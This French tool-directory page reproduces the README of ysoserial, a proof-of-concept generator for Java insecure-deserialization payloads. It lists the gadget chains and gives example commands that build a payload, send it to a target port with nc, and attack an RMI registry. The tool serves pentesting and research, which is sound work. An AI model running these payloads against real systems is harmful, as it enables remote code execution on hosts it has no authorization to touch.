Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ysoserial — Un outil de preuve de concept pour générer des charges utiles exploitant la désérialisation non sécurisée d'objets Java. | Kitploit
Outils/GitHubGitHub/frohoff/ysoserial
Frameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubfrohoff/ysoserial

ysoserial

Un outil de preuve de concept pour générer des charges utiles exploitant la désérialisation non sécurisée d'objets Java.

Voir le dépôt
9.0k1.9kil y a 8 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

ysoserial

GitHub release Travis Build Status Appveyor Build status JitPack

Un outil de preuve de concept pour générer des charges utiles exploitant la désérialisation non sécurisée d'objets Java.

logo

Description

Publié à l'origine dans le cadre de la conférence AppSecCali 2015 "Marshalling Pickles: how deserializing objects will ruin your day" avec des chaînes de gadgets pour Apache Commons Collections (3.x et 4.x), Spring Beans/Core (4.x) et Groovy (2.3.x). Mis à jour ultérieurement pour inclure des chaînes de gadgets supplémentaires pour JRE <= 1.7u21 et plusieurs autres bibliothèques.

ysoserial est une collection d'utilitaires et de "chaînes de gadgets" de programmation orientée propriété découvertes dans des bibliothèques Java courantes qui peuvent, dans les bonnes conditions, exploiter des applications Java effectuant une désérialisation non sécurisée d'objets. Le programme principal prend une commande spécifiée par l'utilisateur, l'encapsule dans la chaîne de gadgets choisie, puis sérialise ces objets sur stdout. Lorsqu'une application disposant des gadgets requis dans le classpath désérialise ces données de manière non sécurisée, la chaîne est automatiquement invoquée et la commande est exécutée sur l'hôte de l'application.

Il convient de noter que la vulnérabilité réside dans l'application qui effectue une désérialisation non sécurisée et NON dans la présence de gadgets dans le classpath.

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Utilisation

root@kitploit:~
$  java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
  Available payload types:
     Payload             Authors                     Dependencies
     -------             -------                     ------------
     AspectJWeaver       @Jang                       aspectjweaver:1.9.2, commons-collections:3.2.2
     BeanShell1          @pwntester, @cschneider4711 bsh:2.0b5
     C3P0                @mbechler                   c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Click1              @artsploit                  click-nodeps:2.3.0, javax.servlet-api:3.1.0
     Clojure             @JackOfMostTrades           clojure:1.8.0
     CommonsBeanutils1   @frohoff                    commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                    commons-collections:3.1
     CommonsCollections2 @frohoff                    commons-collections4:4.0
     CommonsCollections3 @frohoff                    commons-collections:3.1
     CommonsCollections4 @frohoff                    commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
     CommonsCollections6 @matthias_kaiser            commons-collections:3.1
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     FileUpload1         @mbechler                   commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                    groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser            javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient          @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                   json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser            javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711 jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser            js:1.7R2
     MozillaRhino2       @_tint0                     js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                   rome:1.0
     Spring1             @frohoff                    spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                   spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Vaadin1             @kai_ullrich                vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1             @jacob-baines               wicket-util:6.23.0, slf4j-api:1.6.4

Exemples

root@kitploit:~
$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

Installation

GitHub release

Téléchargez le dernier jar de release depuis GitHub releases.

Compilation

Nécessite Java 1.7+ et Maven 3.x+

mvn clean package -DskipTests

Statut du code

Build Status Build status

Contribution

  1. Forkez-le
  2. Créez votre branche de fonctionnalité (git checkout -b my-new-feature)
  3. Validez vos modifications (git commit -am 'Add some feature')
  4. Poussez vers la branche (git push origin my-new-feature)
  5. Créez une nouvelle Pull Request

Voir aussi

  • Java-Deserialization-Cheat-Sheet : informations sur les vulnérabilités, outils, blogs/écrits, etc.
  • marshalsec : projet similaire pour divers formats/bibliothèques de désérialisation Java
  • ysoserial.net : projet similaire pour la désérialisation .NET
Télécharger l’outil